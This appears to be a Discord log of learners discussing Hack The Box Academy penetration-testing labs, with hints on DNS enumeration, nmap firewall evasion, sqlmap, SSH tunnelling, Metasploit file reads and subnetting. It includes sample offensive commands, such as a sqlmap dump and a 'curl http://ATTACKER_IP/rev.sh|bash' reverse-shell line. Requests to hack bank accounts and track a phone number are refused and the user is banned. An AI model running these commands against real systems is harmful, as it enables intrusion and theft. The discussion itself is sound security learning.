#modules
<ip> ns.inlanefreight.htb in /etc/hosts and ns.inlanefreight.htb in your resolvers.txt
okay
You can run curl -H 'Host: subdomain.domain.htb' domain.htb to test if there's A/AAAA records, for example.
Does the HTB cert have any real acceptance, or is it more for personal gain?
You can directly write the ip into resolver.txt
Will this work? Yes. But you can just add the IP address which doesn't involve any guessing for subs like ns
Both
Ah, that makes sense. I just had it mapped in my hosts so I put the name.
If you add a name as a resolver, another resolver needs to resolve it to an IP address
Who watches the watchman, right?
@acoustic owl I'll leave it to you to reply Dom :). Also, @lapis lion you should use #cpts
Sorry, I am new to this Discord, still figuring out which chats go where, ty!
Thanks for the tip
just copy-paste your question there
will do!
can we not post screenshots here?
Read and follow #welcome
permission to DM someone?
Sure
For example, check this page
https://boards.greenhouse.io/synacksrt/jobs/150860
Global
ahhh so it is a pathway.. nice!!
Thank you for the link @acoustic owl I appreciate it !
@clear hatch You must not mention so many people at once. The police bot does not like that
The name server exists on your host. The /etc/hosts file is what it uses to resolve domain names
Are there any specific certs for internal network penetration? Nothing to do with web
That is not quite correct
https://securityzines.com/assets/img/flyers/downloads/howDnsWorks.png
The hosts file overrides other name servers is what I'm getting at
I believe, could be wrong
Yes, the hosts file is requested first.
Are there any specific certs for internal network penetration? Nothing to do with web
You need a permit. Before that, it must be clear what you are allowed to do and what not.
bruh
just need a certification
bruh, I can only log into the academy part of htb for some reason
This is normal.
For the main platform you need another login
Hey! I'm on the Shells & Payloads module, on the final assessment.
I understood what the exercise is asking to do, but in order to do it, is it not required to access a web browser? Because I can't find one on the foothold machine. Am I being dumb, or do we have to do the assessment without accessing a web browser?
Alright thanks, I was cURLing all the way
I'm on Password Attacks, on Credential Hunting in Linux https://academy.hackthebox.com/module/147/section/1320
And I have SSH'd onto the machine as sam from the previous modules
I found the backup files and Kira's SSH files, but I can't actually do anything with either of them
What am I missing?
Someone who use ligolo-ng?
For double-pivoting, should the 0.0.0.0 be my IP, or is it 0.0.0.0?
figured it out nvm
I just do 0.0.0.0 for both and it's smart enough to work
The 0.0.0.0 makes it listen on all interfaces
Hi guys, I'm doing Web Attacks, Mass IDOR Enumeration, and I can't find any files under /documents for any employee at all. It's empty. I did the first 2k employees in case it was a trick and they were scattered, but nothing
nvm, Burp was blocking stuff
It's a bit weird because you're doing it over a VPN on HTB's network, normally you could just do nslookup IP and it would work
Cronos didn't provide anything too challenging, but did present a good intro to many useful concepts. I'll enumerate DNS to get the admin subdomain, and then bypass a login form using SQL injection to find another form where I could use command injections to get code execution and a shell. For privesc, I'll take advantage of a root cron job whic...
Here's a good example of using nslookup and specifying the server
Module: Network Enumeration with Nmap
Chapter: Firewall and IDS/IPS Evasion - Hard Lab
Description: I need some guidance on how I'm supposed to be enumerating the services. ||First I ran a simple -sT scan with default settings and I received ports 22 (ssh) and 80 (http) open. I then ran another scan across all ports and got the same result. After that I ran a -sU scan with options -Pn and -n, which found NetBIOS running on port 137. I enumerated all of the ports I found (22, 80, and 137) with --script vuln,discovery,auth,version, with nothing conclusive found. On port 80 the directories found returned 403 Forbidden. I'm at a bit of a loss; I think the only real options I could have missed are the speed of the scan and wait time values. I ran most of the above scans with --packet-trace and couldn't find much.|| Am I overlooking something, or is there a different approach to take?
Still confused about your syntax remark. I see what control Enterprise Admins has over the domain object, but I can't get it to accept any of my answers.
Skills Assessment - SQL Injection Fundamentals
Used ffuf to find the following URLs: http://83.136.252.24:41068/dashboard http://83.136.252.24:41068/dashboard/index.php
I have already tried to inject via HTTP POST (login credentials) but no success so far. Does anyone have a guideline or recommendations on what to look out for?
For this one I had to run it from the pwnbox and ||use source port 53||
Ahhh see I used ||nc and made connections when using the source port as 53|| but I didn't think much of it. Thank you very much, I have something else to play with now
Sure thing, let me know if you need anything else
Its case sensitive.
First 3 letters are capitals, remaining are lower case.
I'm still having a hard time, I'm running variations of
||sudo nmap --script version -sU -p 22,80,137 -g 53 10.129.226.151 --max-retries=0 -Pn -n --disable-arp-ping --stats-every=10s --packet-trace||
It looks like I'm getting the same results, so I may just not have a very keen eye for what it wants me to find.|| I can only get the version of the web server and ssh.||
Try ||sudo nmap -sS 10.129.2.47 -p- -g 53||, it was really inconsistent for me, I remember this exercise being kinda wack
nslookup domain ip
Read the section under the proxy part for ids/ips evasion detection
That will clue you into the type of scan it wants
Immediately helpful. For a moment I was confused about the proxy part because I didn't have any addresses to use, but I understand where my flaw was.|| I used -sU thinking about UDP 53 where I just needed to use TCP. I found what I need to enumerate now. Thanks guys @quiet ember :D||
Yep in-fact if you slightly modify the direct port scan from the example to be all ports, it'll pop up as well :)
I've done quite a bit of command tinkering on this
Sounds like it, now I wonder if that technique will work through all of the modules. This was a very fun experience
You mean slight modifications to commands?
Yeah to the example commands
Always. Break the command down to the bare minimum
It's because there's a specific domain it wants you to enumerate
Ahh I'm back to square one again, I have the port and the service but now I'm having an issue grabbing the banner. I keep getting a "no route" error with netcat and all my nmap attempts come back as filtered. There has to be something I'm not understanding, I've been on this hard lab for a day now
||IPSs will limit the traffic rate and block it if it becomes too much, maybe it's a speed issue? The IP address isn't blocked, I can still run my scans and get a result, so I think it's just a regular firewall. Is it possible to configure NC to ignore ICMP responses like destination unreachable?||
I'm not at home to check my notes but remember you're looking for the source of your port issues
I didn't do anything different, I restarted the machine and was able to get the flag with the same methods I used prior. I'm not sure what went wrong there, but I'm glad I got it. Thank you for the tips Marcie, I think that ends our discussion tonight!
Ah the good Ole reset technique
It happens
Anyone do SQLmap essential skill assessments?
Plenty of people have
Just ask your question regarding what you're stuck on and what you've tried?
Yes wait
sqlmap -u 'http://83.136.251.221:47198/action.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: /' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/json' -H 'Origin: http://83.136.251.221:47198' -H 'Connection: keep-alive' -H 'Referer: http://83.136.251.221:47198/shop.html' --data-raw '{"id":1}' --dump -T final_flag -D MySql -temper=between
What I did wrong here?
Even when I follow it, still error.
Lab issue?
Is that... a spoiler channel, showing academy content?
I don't know
So you're telling me you saw the answer
I saw it, but I did not copy it.
You just pasted spoilers here lol
I'm trying to find what I did wrong with my own idea
I dunno how HTB hasn't taken that down already
wait like a YouTube vid?
Guys, I'm having trouble connecting to Hack The Box's VPN
Download the VPN file again
there's some channels on yt that spoil paid academy content.
yeah I know, just clarifying thats what someone posted here lol
Hi there, could anyone help me with the BloodHound Skills Assessment final question about the percentage of users with a path to GLOBAL ADMINISTRATOR? I think I had identified the AZUsers, but all my answers were wrong. Thanks in advance
Here is a cheat sheet.
There you will find the query and only need to convert it to Azure
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
What is the answer to this question in the Bug Bounty Hunting Process module?? It's talking about the CWE & CVSS score. Is it not Attack Vector? I tried so many different combinations of writing it but it just doesn't work
They require something more specific
I'm assuming it's Adjacent then? it doesn't work either, hmm
time to try like 100 different ways of writing the same thing
Make sure you don't have any trailing spaces
nvm I got it, it's just "Adjacent" all by itself. I guess I'm just being stupid. Thank you for the help @umbral wigeon
Hello, in the Footprinting module (DNS section), there is a line: "However, other DNS servers may be configured differently and, in addition, may be permanent for other zones." What does "DNS may be permanent for other zones" mean? I didn't understand that part
Ah I misread it I thought you only shared the sentence fragment
The last line of the paragraph. I don't understand it
It just means that there can be multiple DNS servers for multiple zones
how do you define a zone?
Google it
k
Hi there, I have a concept question about SSH tunneling.
There is a 10.129.15.50/172.16.5.129 host which has port 3306 open.
And my host IP is 10.129.15.51.
I want to forward local port 1234 to 3306.
Then this is the correct command:
ssh -L 1234:localhost:3306 ubuntu@10.129.15.50
But why can't I use the below command?
ssh -L 1234:10.129.15.50:3306 ubuntu@10.129.15.50
Because we can use
ssh -L 1234:172.16.5.130:3389 ubuntu@10.129.15.50
where 172.16.5.130 is another host in the 172.16.5.0/24 subnet.
Hi, I have a Password Attacks hard lab question
I samdump2'd the dump file from the encrypted VHD and got the Administrator hash, but I'm not able to pass-the-hash login anywhere. Am I missing anything?
NAT? You're probably behind one
Yes, my Kali is in NAT
So how to change it?
Yeah, I see it
My Kali is set on NAT
I wanna change it??
@rustic sage if you are new here, read #welcome and #rules. After that, use /verify at #bot-commands. This channel is for Hack The Box Academy; after you verify, take it to something like #hacker-lounge
But the answer to your question is a Google search away, so do that first
I am verifying
if your hash doesn't start with ||e5|| and end with ||a1|| then you probably got the wrong hash and try with something like secretsdump
I cannot find my hash where it was
please keep this channel on topic. thank you ๐
Yes, I will look again... that means the information from the .vhd is unusable
If anybody wants to develop a note taking methodology using obsidian I have some great resources that has helped me make very good notes
You don't give me the answer
I don't get why you want your internet IP. If the router doesn't forward, whatever your IP behind NAT is is useless
I am making a file which accesses any PC for some study purpose and installed it on my other laptop which has WiFi in it, but it doesn't work
because I set my ethernet IP in that virus file
so I think that I wanna put my WLAN IP so it will connect then
but I can't find it; when I type ip addr or ifconfig in the terminal it doesn't show
You're not on the topic of the room
Sure, my notes suck and I want to at least redo some of them before doing some exams, can I DM?
Mr. Hacker, before you try to virus or do a big thing.. go back and study more on networking and such
yeah you are right
It doesn't work the way you think
I just wanna study networking
Try YouTube, fundamentals are everything
more hint?
@vital adder yes
my head hurt now hahaha
A tip for that is Red Bull
Anybody done the JavaScript Deobfuscation module? My answers aren't right I think, but I'm wondering where I'm messing up
Can anyone help me with the question "How many total packages are installed on the target system?" on Linux Fundamentals - File Descriptors and Redirections?
I searched and it seems the answer is something like "dpkg -l | grep 'ii' | wc -l" but I don't see the lesson mention dpkg anywhere
look in the "cheats" section, dpkg is in there
I don't think there's much in the lesson on it (I don't remember tbh)
I saw the cheat sheet but I assumed there would be a way to get the answer without using dpkg so I wasn't sure if I should open it
At first I tried something like:
find / -type f -name *.dpkg 2>/dev/null | wc -l
Thanks @wraith sable
what's the issue?
The answers I'm getting to the decoding and skills assessment questions; for decoding I'm getting the 'secret message' from the hash, but neither the secret message nor the other key I'm getting works for the answer
Mind if I send a screenshot? It'd explain better lol
sure shoot me dm
Hiya lovely peeps
I've encountered a bit of an issue and I can't seem to figure out if I'm doing something wrong or if LOLBAS is out of date.
I'm currently going through the "Living off the Land" section of the file transfer module, and it mentions using "certreq" to make post requests to a netcat listener. LOLBAS also mentions the use of this "-Post" parameter for certreq.
However, when I'm attempting it on the Windows VM provided in the optional exercises section, I'm getting a "The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)" error message. My googling hasn't been able to find me the solution, so I was wondering if you guys would know
What does your full command look like?
CertReq -Post -config http://<myip>/ C:\Users\htb-student\Desktop\upload_win.txt
Reference article for the certreq command, which requests certificates from a certification authority (CA), retrieves a response to a previous request from a CA, creates a new request from an .inf file, accepts and installs a response to a request, constructs a cross-certification or qualified subordination request from an existing CA certificat...
Yeah, unless -post is a hidden flag, I can't find any documentation that mentions it.
If it did exist, it's likely it doesn't anymore.
k thanks. Glad to know I'm not going crazy
I'll put in an erratum for it.
Looking through the channel history, this seems to have come up before a couple times, with the same answer.
Yeah, should've checked before posting. My bad.
I've put in an erratum and opened an issue on the lolbas project as well.
Has anyone done DACL Attacks 1: AddMembers ( https://academy.hackthebox.com/module/219/section/2332 ) and can share some insight? I'm working through Q1, and I've made pedro a member of the TestGroup, and I can see Read Write access to the share via CME, but it still says Access Denied.
Hi guys, quick question if someone can help, please and thank you. In the screenshot there is a script; I took the script and ran it after I changed the target port and IP, but I can't recreate the result. I'm getting a file called download.php that contains the text 'contract is not defined'. I thought in the course material we should be able to at least recreate what they show us. NVM, they show a harder way in the text but in reality it's way easier..
Trying to add the 50064.rb exploit to Metasploit on the remote machine in the Shells and Payloads module, but when I run "updatedb" or "sudo updatedb" it doesn't work
@wild dragon Can you help him?
@pine dagger text me, I'll help you!
INFORMATION GATHERING - WEB EDITION - whois - What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?
Whois results gave me: email@markmonitor.com and email@dnstinations.com
Bounty page on Bugcrowd gave me vulnerabilityreporting@tesla.com
None was right, other places to look?
Hi,
In the DACL Attacks Skills Assessment, I'm stuck on the 4th question: what's Jose's NTLM hash? I checked BloodHound, I didn't find anything.... I am confused, any hint?
run it again and read the output again
Can I show my answer to someone who passed Linux Privilege Escalation to see if my answer is correct? I'm on the section Linux Services and Internals Enumeration; I type the answer but it shows me "Wrong answer"
Will do! Just out grabbing ice cream
There probably is but as it's a fundamental course: they're only teaching the basic way
?
Short answer no. You said you're typing the answer, why not copy/paste the answer
if you need help with that DM me for help
Refresh page and try again. Also read the question carefully to make sure you're answering the question properly
Refresh it several times
try harder.
That's why I just ask someone to type what I type as the answer, to tell me if I'm wrong or the box is buggy
What is the question asking?
What is the latest python version that is installed on the target
Slava Ukraini.. but this is not a hint. If you don't have a real answer please don't answer, because I'm focusing on the lab
thanks
And you're sure you're on the target system when you're running the command to see which version is installed?
Absolutely
Damn, your HTB profile is the real deal.
What command are you running?
Whereis python, then type /usr/bin/python3.11 --version
Why not do which python
Anyone help please
You have to find out the LAPS password --> use it to remote to WS01 --> mimikatz to retrieve the NTLM hash of users!
Have you tried to just use it?
text me if you want my hand
Because it doesn't show me anything
And what is the difference?
Are you typing 'python {version}' or just '{version}'
Thank you! Oh, yesterday I was definitely sleepy because I didn't see it, thank you again.... I will check it and then if it doesn't work I'll ask you in private
yes, just text me, feel free, bro
And currently not able to check it or run it
If you utilize the discord search feature though you can see if someone else has asked the same question. Just don't forget to do in:modules in the search query
Done mate, thank you again
It was really easy, but maybe I was overthinking
Ok
It was without the subversion
:)
But yeah, in future, search first and see if it was answered
Saves a lot of time
Ok, thanks for your time
Thank you, I finished it
https://academy.hackthebox.com/achievement/75267/219
It's a really recommended module
Discretionary Access Control Lists (DACLs), found within security descriptors, are a fundamental component of the security model of Windows and Active Directory, defining and enforcing access to the various system resources. This mini-module will cover enumerating and attacking common DACL misconfigurations, allowing us to escalate our privilege...
How is it listening to the same port?
the attack host is listening on 4443 which means the target host has to connect to it using the same port
Damn, I was reading it like
statement
command
statement
command
Thought it had socat listening on 4443 and nc as well
thanks
np, you can use netcat as both a listener and a connector
Hey, rereading, I'm getting to the same place...
In the example, the attacker is starting a socat listener on 4443
executes an unknown socat one-liner (I assume to 4443) on the target
and is getting a revshell on netcat listening on the same port
Hello, I'm currently in the last section (859) of module 77 (Getting Started). The task is: "Spawn the target, gain a foothold and submit the contents of the user.txt flag." The webapp is running a vulnerable version of GetSimpleCMS. I also did enumeration to get hidden pages and found the admin login panel. However, I have no idea where I can find the password, but I found an API key which can be used (https://www.exploit-db.com/exploits/46880 - "however authentication can be bypassed by leaking the cms API key to target the session manager"). But how can I target the session manager now?
What module is this?
Attacking Enterprise Networks
yep
It's a very roundabout method to stabilize a shell imo, but I've definitely done worse
I'm not understanding the example though
- <VULNERABILITY> lets you run a socat reverse shell on the target, which the attacker receives with netcat, listening on 8443
- Then, to stabilize, the attacker starts a new socat listener on 4443, and uses the reverse shell on 8443 to submit a new socat command to connect to the 4443 listener
There's no redirecting, it's literally just getting a reverse shell, and then using the reverse shell to get a better reverse shell
no, this example is just really confusing
I assume they do this to get around constraints by exploiting <VULNERABILITY>, but this is still kind of convoluted
command injection was with filters so yeah, easier
Well man, thanks for taking your time
You're ahead of me lol, I was beyond confused when I looked at it for a second time
Does someone have an idea? I don't really want to brute-force the hashed password now...
The weirdest thing about it is that having to run the reverse shell twice kind of defeats the purpose of using socat imo. I haven't done the module, so I don't know if there's anything weird with that box, but I feel like an nc mkfifo or even a curl http://ATTACKER_IP/rev.sh|bash would have worked
I was literally going to try that
Give me 10m and I'll help you out
I would help but I genuinely don't remember what that box was and I didn't take notes
thanks man, i appreciate it
or nevermind
@sly reef
pass was "admin"
xD
Who can help me decode a secret code please?
Crypto?
No, just a secret code
like secretcode=....................................................
Dude, we need context
I want to decrypt the secret code, I don't know how to do that
In web stuff
Where is this code being used, which is the code?
Did you see @sly reef?
Can I DM you please?
yeah
This has nothing to do with htb academy please keep things related to that
Hi @fathom pendant . Pertaining to "Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory" from the "Pass the Ticket (PtT) from Linux" in the Password Attack module. It appears the credentials do not work. I ran ssh command in verbose mode there was a successful server connection. Additionally, I verified this with traceroute the htb vpn connection 10.10.14.50, connected to 10.10.14.1 then to the target ip address. I copied and pasted the credentials and double checked and they were correct.Yet when I entered them I keep getting the error, "Permission denied (publickey,password)". No idea what I am doing wrong...
I currently do not have internet access to verify this. I dont recall having issues
Solved it:
"Scenario
To practice and understand how we can abuse Kerberos from a Linux system, we have a computer (LINUX01) connected to the Domain Controller. This machine is only reachable through MS01. To access this machine over SSH, we can connect to MS01 via RDP and, from there, connect to the Linux machine using SSH from the Windows command line. Another option is to use a port forward. If you don't know how to do it, you can read the module Pivoting, Tunneling, and Port Forwarding."
Basically, had to use credentials from the previous section and then ssh from that machine....
Hello all, just a reminder, as it just happened to me.
If you are stuck in the Information Gathering - Web Edition module, at the Information Gathering - Web - Skills Assessment section, last question, which is "Perform subdomain enumeration against the target githubapp.com. Which subdomain has the word 'triage' in the name?"
And you have been using sublist3r, then you probably won't find the right subdomain, as I assume that the required subdomain has been removed and I haven't had any luck with sublist3r. What I can recommend is using https://subdomainfinder.c99.nl/ as suggested by @vital adder.
Subdomain Finder is a scanner that scans an entire domain to find as many subdomains as possible.
Can anyone help me with Linux Priv module SUDO section?
Hey guys
Run sudo :^)
Who here
Though your username suggests you have no idea what any of this is
This channel is for discussion of the learning modules found on https://academy.hackthebox.com not for casual chit chat
Hi, I'm having some issues with the skills assessment for the Shells and Payloads module. I have managed to upload some payloads to host 1 (both manually + with msfconsole) and they are being uploaded and showing in the dashboard as running, but when I try to navigate to the URL to activate them I'm just getting 404s
Are you sure you're navigating to the right url. You might be one or two directories too deep. I struggled with this too
I'm clicking the link from the manager page
Hi guys, I have a question. I don't know if I am right: I should find an exploit and capture the flag for this question, but I don't know if I am right.
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start) --Module Getting Started
This is the exploit I found, but I don't know if I'm right.
Exploit: MyServer 0.4.3 - Denial of Service
URL: https://www.exploit-db.com/exploits/94
Path: /usr/share/exploitdb/exploits/multiple/dos/94.c
Codes: OSVDB-2808
Verified: True
File Type: C source, ASCII text
Can someone verify if this is correct so I can continue because I have not found the question.
I don't think you want a denial of service
Perform the search in the following way
searchsploit 94.237.54.69 -p 31249
hello i got a question but can someone help me in private to avoid making a spoiler of the SQL module ? it's about the email of otto lang
Wrong
With searchsploit you need to search based on vendor/package, not an IP address
So it is not that way to perform the search.
First: because it's a DOS exploit. So definitely not correct.
Second: just identify the services by running an Nmap scan first and seeing if there's other ways to interact
If I'm recalling correctly, you only need a small amount of enumeration to know what to use
I ran it through nmap but did not know how to approach starting the capture.
Capture of what?
Well it seems like a public exploit. Perhaps visiting the website will be useful
the answer
This is what I found with nmap, because I had already done a scan but didn't know how to approach it
19/tcp filtered chargen
22/tcp open ssh
139/tcp filtered netbios-ssn
55600/tcp open unknown
Start simple - visit the target
If I'm remembering, it is a web page (http://ip:port)
If it is wordpress
My note taking wasn't great for that module, but I think there is a decent chance the exploit you need is one of the ones discussed in the module
Think slightly more narrowly, there may be a plug-in that's vulnerable
Look up how to do an nmap scan in the modules again to get more info
Searching for exploit pos ssh will be the answer
I mean, I did a scan with the port in conjunction with other ports and I don't know how to search for the exploit.
The target spawns with a port that is given
It is not required to scan the whole target's ports
^
Whenever a target gives you a port it is reasonable to assume they want you to focus on that
Yes.
wow
In general though, when you're looking for exploits you want file upload/download or remote code execution, not denial of service
the goal is to extract data from the target machine, not just crash it
34164/tcp closed unknown
open it in a web browser
Hello, any hint for the Password Attacks module?
^
Use the provided lists
Or rockyou
Do not try to dos their server running the docker container
Too long; 90k, the machine finished before hydra was done
I mutated 4 lists and none
Don't brute-force SSH
FTP, SMB :/ none
You're not really providing much info for me to actually be helpful
What section are you working on
What I also want is to find it by my own means and not be given the answer easily.
Getting Started
Module: Public Exploits
There are multiple conversations going on here :p
Visit the webpage
Literally that's 90% of the work
@fathom pendant I have been doing Hack The Box for the past 6 months and now I am at Hacker rank, so next shall I subscribe to VIP or shall I go with Academy premium?
Whatever works best for you brother, Academy and the main platform are separate
I just worked out what I was doing wrong: the exploit wasn't in the web root of the app, I had to include the jsp file in the URL :p
@fathom pendant Yes, so which shall I purchase?
Can you suggest which is best for learning?
You're asking the question in an academy channel :p
Academy is best if you want to learn in a slightly structured way. VIP on main gives access to retired machines that have writeups which you can also learn from
Ok bro, I am a student, so what steps should I take to claim the voucher?
You mean Academy subscription discount?
I think I found the exploit Simple Backup Plugin 2.7.10
Yes for discount for students
If you didn't sign up using your academic email, message support
Can neither confirm nor deny. But why don't you use searchsploit or msfconsole to see what you find
That's what I'm going to do; I'm going to search Rapid7 and continue the adventure
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thanks
I have found this for the moment and I think I have to look for the answer. @fathom pendant
/home/kali/.msf4/loot/20230715213516_default_94.237.62.173_simplebackup.tra_907693.txt
I can't see it lol, it's on your local machine
But that probably is correct
No
Why
what is orange account
Read #rules
Don't poke, as the conversation is going to lead very off-topic
Because it is not legal nor relevant to this channel
how do you flag a serious rule break again?
@urban sage
This guy DM'd me after being told no here and is asking me how to hack bank accounts.
Please ban this guy
@sterile hawk
xD
hahahaha
@fathom pendant I have found the vulnerability but I can't find flag.txt
exploit: Simple Backup Plugin 2.7.10
Read the options for the msfconsole exploit and see what can be changed
msf6 > use auxiliary/scanner/http/wp_simple_backup_file_read
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > show options
set RHOSTS 94.237.54.69
RHOSTS => 94.237.54.69
set RPORT 31249
RPORT => 31249
what other options are there?
run
20230715213516_default_94.237.62.173_simplebackup.tra_907693.txt
root: 0:0:root:/root:/bin/bash
daemon: 1:1:daemon:/usr/sbin:/usr/sbin/nologin
I found something like this but not flag.txt
that looks like /etc/passwd, what options does the exploit have for you to configure it?
Lol was he banned?
In the source code of the page the plugin used appears, and with the search on Rapid7 I have found how to use it, but when I scanned it I got a completely different file than the one I need.
Yes.
I will review the advanced options
This is the exploit: use auxiliary/scanner/http/wp_simple_backup_file_read
what options does it have?
ATTACKING ENTERPRISE NETWORKS | Active Directory Compromise
I need to obtain SID from Server Admins but the command is not outputting anything... $group = Convert-NameToSid "Server Admins"
any ideas?
Muah
Linux Privilege Escalation - Sudo Module
Can't figure out how I can read flag.txt or elevate my privileges?
use sudo
I have run 'sudo -l' but still have a problem with elevating privilege using ncdu.
Look at the options for ncdu
Still stuck? You can dm me.
thanks @thorn urchin , I spent hours enumerating, got many hashes, passwords, usernames, compromised machines, priv esc, Rubeus, tickets, mimikatz.........
until your hint got me to do it in a few mins ¯\_(ツ)_/¯
someone need help with anything?
@zinc marsh Hey, I just posted in community-help. Not exactly a module question issue, just struggling a little with my VM configuration. i don't know what's wrong with activate-global-python-argcomplete
my head lore is that it turns out the other pentester didn't just have to leave for some reason, he was incompetent and that's why you had to step in.
can someone please help me with the MSSQL question?
I can't paste what I tried here
it's involving the enumeration part from Footprint module
heeelp
xdd
Damn it !
XD
Module name: Attacking Common Application
Section name: Attacking Thick Client
Anyone have encountered this issue? When I tried to deselect the Delete subfolders and files and Delete
I got the following error when I re-ran the Restart-OracleService.exe
The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
'c:\programdata\restart-service.exe' is not recognized as an internal or external command,
operable program or batch file.
Could Not Find c:\programdata\restart-service.exe
I have no idea if I did it wrong or if I'm missing something.
Dealt with
I'm sure it's a ratio of 10:1 of "fuck you":"thank you"
can you please help me with this
What's the actual question
Also if you verify through the instructions in #welcome you can paste screenshots
I'm at work and about to be off break
Brother verifying will also help with that
TT-TT
there's something wrong with my Python web, how do I fix it? I can't code anything there
xd
is there anyone who can trace the location of someone via mobile number because someone has cheated me please?
.htb is intended
No, read #rules
if it was your mobile, yes; if not, no. DM
Check dm
Means?
this channel is not for that, it is for doubts.
but what is the doubt
I don't have notes on this section, I have some rusty commands left from that section
I can share a little hint but you gotta figure out the rest if you want to...
htb is not a TLD
.com works because I'm pretty sure they own an inlanefreight.com domain for the corporate osint module
I think I did that with the htb after using the .com by anyway
but I don't have notes
but I think subbrute only worked with TLD and I don't remember if you could add .htb manually
Because .com is an actual registered domain
But it's not going to give you the answers you're seeking @rustic sage in fact I gave you the format for the answer
hello any advise on how to fix this metasploit error please?
I'm on the tail end of Windows priv esc part 2 but shells are being weird, timing out / no response?
I've run msfdb reinit
Great success
No idea I don't use metasploit
well I use it for the eternalblue and that's all
what is the flag format for Documentation & Reporting in regards to Steve needing to split screens? I've tried every combo based on pressing ctrl-b, releasing the keys and then pressing the % key, so I thought the flag would be [Ctrl] + [B] + [%] and it is incorrect
what does +2 mean in the lower table
network and broadcast address
ok thanks
that table is pretty bad tbh
The IPs column refers to the number of addresses per subnet, and not the actual number of IPs,
And teaching classful networking in this day and age is... bad
can you send the table which using nowadays?
Classless Inter-Domain Routing (CIDR ) is a method for allocating IP addresses and for IP routing. The Internet Engineering Task Force introduced CIDR in 1993 to replace the previous classful network addressing architecture on the Internet. Its goal was to slow the growth of routing tables on routers across the Internet, and to help slow the rap...
Is the network address the same as the ADSL address?
No. https://networkengineering.stackexchange.com/questions/11200/what-is-the-purpose-of-network-address
there are 4 keys in the answer
it's also explicitly given in the text
https://academy.hackthebox.com/achievement/710422/67
After gaining a foothold, elevating our privileges will provide more options for persistence and may reveal information stored locally that can further our access in the environment. Enumeration is the key to privilege escalation. When you gain initial shell access to the host, it is important to gain situational awareness and uncover details re...
ok thanks
htb is already a top-level domain, but it is not an official TLD and therefore it cannot be resolved by the root servers.
guys i do not understand this
according to my understanding of subnets, when an octet has a number it refers to the network address and the host address must be bigger than this number
isn't this number, which I drew a red circle around, bigger than 192?
A subnet mask of /26 is 11111111.11111111.11111111.11000000. You take the bitwise AND of that mask with the IP address in binary. Of importance here is the last octet, so a bitwise AND would AND 11000000 with 10100000, which results in 10000000. That corresponds to 128, so the network has addresses from .128 to .191 (/26 corresponds to 256/2^2=64 addresses, and there are 64 addresses from .128 to .191 (inclusive))
I'm not really sure what you're asking by "bigger than 192"
Often you'll see 192.168.12.128/26 to refer to the subnet, but you might also see 192.168.12.160/26 to refer to the host and the subnet
This is because htb cannot be resolved from the root nameserver. You could have just used the IP address instead. dig www.inlanefreight.htb @10.10.10.10
Then you don't need an entry in the hosts file either
I also think he's misunderstanding what I'm meaning by domain in the context
Domain is inlanefreight.htb and ip is spawned ip
I do not know what bitwise AND is?
0 and 0 makes 0, 1 and 0 or 0 and 1 makes 0. 1 and 1 makes 1.
ok thanks
hi
Doing Attacking Common Applications: Exploiting Web Vulnerabilities in Thick-Client Applications { https://academy.hackthebox.com/module/113/section/2164 } and after updating and running the fatty-client.jar I get these errors, and I have followed the steps as indicated, help if you can please!
subnetting is very confusing, I advise looking up external resources to help explain things to you, more specifically YouTube videos.
ok thanks
Just look up VLSMs.
Don't waste your time with videos.
People find subnetting difficult because they're bad at math. That's pretty much it.
I mean tbh you can just use a calculator
yeah lol
You'll only need to do it manually on the ccna
why don't I just use the CIDR table?
My main point was that the HTB module on subnetting was quite confusing. (at least for me).
External articles and resources explained it better for me.
I should go and check out the other tier 0 modules. So far they have all been poor.
Well, you can do that.
It's pretty easy when you know 256->128->64...
They serve as a good starting point but honestly external resources helped more.
I haven't even finished tier 0.
I still think learning process was the worst. I've already ranted too much about that though.
Some of the stuff would be hard to teach without actual objectives tbh.
If you're not illiterate in tech, then I should be able to tell you what a conf file is, but beyond that there isn't much to say about them if you aren't going out of your way to actually configure them
https://news.ycombinator.com/item?id=36466182 stuff like this exists, and it doesn't really make much sense unless you have actually configured something before.
Programs should not only report where the configuration files are located, but also report how configuration options contained therein are read in: Some programs use a "last occurrence wins" approach, while other programs (e.g. sshd) use a "first occurrence wins" approach. Buried in https://man.freebsd.org/cgi/man.cgi?sshd_config(5) and awkwardly ...
Without that, all the modules basically become fun talking points where they go "this exists, but I won't really elaborate on it in a meaningful way"
Of course, knowing something exists is pretty important.
I went through Learning Process the other day, it was such a bunch of nonsense, if I hadn't heard a ton of good things about Academy in general, I would have run away from it
Yeah. Maybe the tier i-iv modules are good, but the tier 0 modules aren't selling me on it
It's funny when selling you on it is exactly what they're supposed to do
That module basically amounts to "Can you do it? Yes you can!" ...cue Bob the Builder music.
You don't even know the pricing structure until after you sign up for academy. I don't know what they're doing. It's as if they don't want my money.
The pricing structure is unnecessarily convoluted
Purchasing the tier i and tier ii modules by themselves is cheaper than silver. I don't know how to express how funny that is.
Yeah, silver seems fairly pointless, I guess the selling point is the 1-on-1 coaching for the annual? There's Google and Discord, that's enough
Was mostly a bunch of philosophical/motivation speech type of thing
Currently doing the CPTS path, stuck at pivoting. The SocksOverRDP dll is always getting blocked by the spawned Windows system, since it detects it as a virus. Cannot load the plugin with regsvr32.exe SocksOverRDP-Plugin.dll. I confirmed that the firewalls are off, no clue how to continue.
Any suggestions?
too bad a lot of it was incorrect nonsense
You don't get a nobel prize in physics by being bad at math, unless you're comparing them to professional mathematicians.
Disable Real Time Protection
Yup, just wanted to update, noticed it was turned on. Mb.
Thanks.
how does multicast have a physical address?
I saw the post debunking everything, it was kind of hilarious
Has anybody else had issues installing tplmap.py in the Server-Side Attacks module, section SSTI Exploitation Example 1?
nevermind, I got it to work
?
I feel like the only thing worth it on the entire academy is the student subscription.
